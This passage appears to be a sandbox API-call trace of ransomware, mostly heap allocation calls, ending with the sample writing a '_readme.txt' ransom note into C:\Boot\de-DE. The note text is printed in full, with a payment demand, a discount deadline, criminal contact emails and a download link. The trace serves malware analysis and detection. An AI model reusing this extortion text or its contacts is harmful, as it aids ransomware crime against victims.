lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.697] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0142.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.697] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.697] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.697] PathFindFileNameW (pszPath="") returned="" [0142.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.697] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.698] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.698] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.698] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.698] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0142.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.698] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0142.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.699] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.699] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.700] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.700] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.700] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.701] CloseHandle (hObject=0x6f0) returned 1 [0142.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.701] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", 